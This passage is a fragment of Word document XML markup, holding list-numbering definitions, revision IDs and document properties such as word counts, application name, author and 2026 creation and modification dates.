    <w:lvl w:ilvl="5" w:tplc="ED406E30">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="87229694">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="57E8DA0C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="94BA5088">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1385645235">
    <w:abstractNumId w:val="0"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="16646291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C1B"/>
    <w:rsid w:val="000C42AB"/>
    <w:rsid w:val="00236C42"/>
    <w:rsid w:val="00237EB3"/>
    <w:rsid w:val="00335269"/>
    <w:rsid w:val="0038631E"/>
    <w:rsid w:val="008F6215"/>
    <w:rsid w:val="00AE1C1B"/>
    <w:rsid w:val="00FC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BAADF"/>
  <w15:docId w15:val="{140F72C3-0830-4552-960B-04E8FF39E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586063f-a9fd-424a-9e11-15b50e6a47a7}" enabled="1" method="Standard" siteId="{e00b6687-c776-4514-8a12-5549c0aabb7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3418</Words>
  <Characters>23351</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1292</Lines>
  <Paragraphs>775</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>26173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Jeevan Paapagaari</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-18T08:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-09T15:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>